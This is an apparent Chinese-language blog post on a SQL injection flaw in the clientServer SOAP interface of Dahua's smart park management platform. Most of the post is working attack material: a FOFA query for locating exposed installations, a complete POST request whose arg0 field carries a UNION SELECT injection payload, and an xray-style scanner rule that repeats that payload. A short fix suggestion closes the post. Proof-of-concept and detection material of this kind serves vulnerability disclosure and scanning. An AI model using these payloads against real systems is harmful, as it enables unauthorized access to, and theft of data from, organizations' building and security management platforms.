Advertisement

大华智慧园区综合管理平台 clientServer SQL注入漏洞

阅读量:

产品简介

基于大华科技打造的智慧园区综合管理平台

漏洞概述

该系统在处理大华智慧园区综合管理平台的clientServer接口时未能有效过滤用户的输入数据,并将其未经验证的内容直接整合到系统中的SQL查询语句中。这引发了严重的SQL注入漏洞。潜在的远程未授权攻击者可利用此漏洞获取敏感信息,并从而进一步可能导致目标系统的权限被非法获取。

复现环境

FOFA:app=”dahua-智慧园区综合管理平台”

漏洞复现

Poc

复制代码
 POST /portal/services/clientServer HTTP/1.1

    
 Host: your-ip
    
 User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
    
 Content-Type: text/xml;charset=UTF-8
    
  
    
 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com">
    
   <soapenv:Header/>
    
   <soapenv:Body>
    
   <cli:getGroupInfoListByGroupId>
    
     <!--type: string-->
    
       <arg0>-1) UNION ALL SELECT 1,2,3,4,version()-- -</arg0>
    
     <!--type: long-->
    
     <arg1>1</arg1>
    
     </cli:getGroupInfoListByGroupId>
    
     </soapenv:Body>
    
   </soapenv:Envelope>

检测规则POC编写

复制代码
 params: []

    
 name: 大华智慧园区综合管理平台 clientServer SQL注入漏洞
    
 set: {}
    
 rules:
    
 - method: POST
    
   path: /portal/services/clientServer
    
   headers:
    
     Content-Length: "113"
    
     Content-Type: text/xml;charset=UTF-8
    
     User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like
    
       Gecko) Chrome/41.0.2226.0 Safari/537.36
    
   body: |-
    
     <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com">
    
       <soapenv:Header/>
    
       <soapenv:Body>
    
       <cli:getGroupInfoListByGroupId>
    
     <!--type: string-->
    
       <arg0>-1) UNION ALL SELECT 1,2,3,4,version()-- -</arg0>
    
     <!--type: long-->
    
     <arg1>1</arg1>
    
     </cli:getGroupInfoListByGroupId>
    
     </soapenv:Body>
    
       </soapenv:Envelope>
    
   search: ""
    
   followredirects: false
    
   expression: response.status == 200 && response.body.bcontains(b'dahua.com') && response.body.bcontains(b'5')&&
    
     response.body.bcontains(b'-log')
    
 groups: {}
    
 detail:
    
   author: ""
    
   links: []
    
   description: ""
    
   version: ""

修复建议

禁止访问来源地址。除非必要,请避免将系统对外开放于互联网。建议升级至安全版本。

全部评论 (0)

还没有任何评论哟~